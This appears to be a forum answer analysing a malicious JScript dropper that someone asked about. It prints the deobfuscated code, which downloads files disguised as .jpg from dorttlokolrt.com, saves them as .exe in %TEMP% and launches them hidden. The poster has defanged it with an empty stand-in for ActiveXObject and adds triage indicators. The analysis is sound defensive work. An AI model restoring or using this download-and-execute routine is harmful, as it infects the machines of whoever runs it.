Basically, it’s downloading a virus to your temp folder and executing it…
You should run a virus scan on the entire network.
// Inert stand-in used in this listing where the sample would call ActiveXObject.
// It is an empty constructor, so `new AxProxy(...)` yields a plain object with none
// of the COM methods used below; the first method call on it throws, not runs.
var AxProxy = function() {};
// Immediately-invoked wrapper around the download-and-run routine and its two calls.
// NOTE(review): as posted, the wrapper ends with `}();` and the parenthesis opened on
// the next line is never closed, so the listing does not parse as-is.
(function () {
/**
 * Download-and-run routine of the analysed sample.
 *
 * @param fr  URL requested with a GET.
 * @param Klw File name; redeclared below as a full path under %TEMP%.
 * @param rn  When greater than 0, the saved file is launched after the request.
 */
function fFh(fr, Klw, rn) {
// Shell object: expands %TEMP% here and launches the saved file further down.
var VeZ = new AxProxy('WScript.Shell');
// Shadows the parameter: Klw becomes "<expanded %TEMP%>\<file name>".
var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\\" + Klw;
// HTTP client object used for the download.
var OG4 = new AxProxy('MSXML2.XMLHTTP');
OG4['onReadyStateChange'] = function() {
// readyState 4 = request complete; only then is the body written out.
if (OG4['readyState'] === 4) {
// Stream object used to write the raw response bytes to disk.
var g38 = new AxProxy('ADODB.Stream');
g38['open']();
// type 1 = binary stream (adTypeBinary).
g38['type'] = 1;
g38['write'](OG4['ResponseBody']);
g38['position'] = 0;
// Save option 2 = create the file or overwrite an existing one (adSaveCreateOverWrite).
g38['saveToFile'](Klw, 2);
g38['close']();
}
};
// Only the request and the launch sit inside the try; the object creation above does not.
try {
// Third argument false = synchronous request, so send() returns after the response arrived.
OG4['open']('GET', fr, false);
OG4['send']();
if (rn > 0) {
// Run(path, 0, 0): window style 0 = hidden, and the script does not wait for the process.
VeZ['Run'](Klw, 0, 0);
}
// Errors are discarded, so a failed download or launch leaves no visible message.
} catch (er) {};
}
// The two invocations are the indicators visible in this sample: one host, two URL
// paths ending in .jpg, and two .exe file names written under %TEMP%. The response is
// saved under an .exe name regardless of the URL's extension, and rn = 1 launches each.
// For triage: a script host fetching over HTTP, then an .exe appearing in %TEMP% and
// being started hidden, is the behaviour to look for in proxy and process logs.
fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1);
fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1);
}();
All the other variable names are just gibberish intended to confuse and discourage decoding.
PS: I’ve replaced ActiveXObject with an empty stand-in (AxProxy), so the code as posted can’t be run…
solved Need help figuring out what this Js does [closed]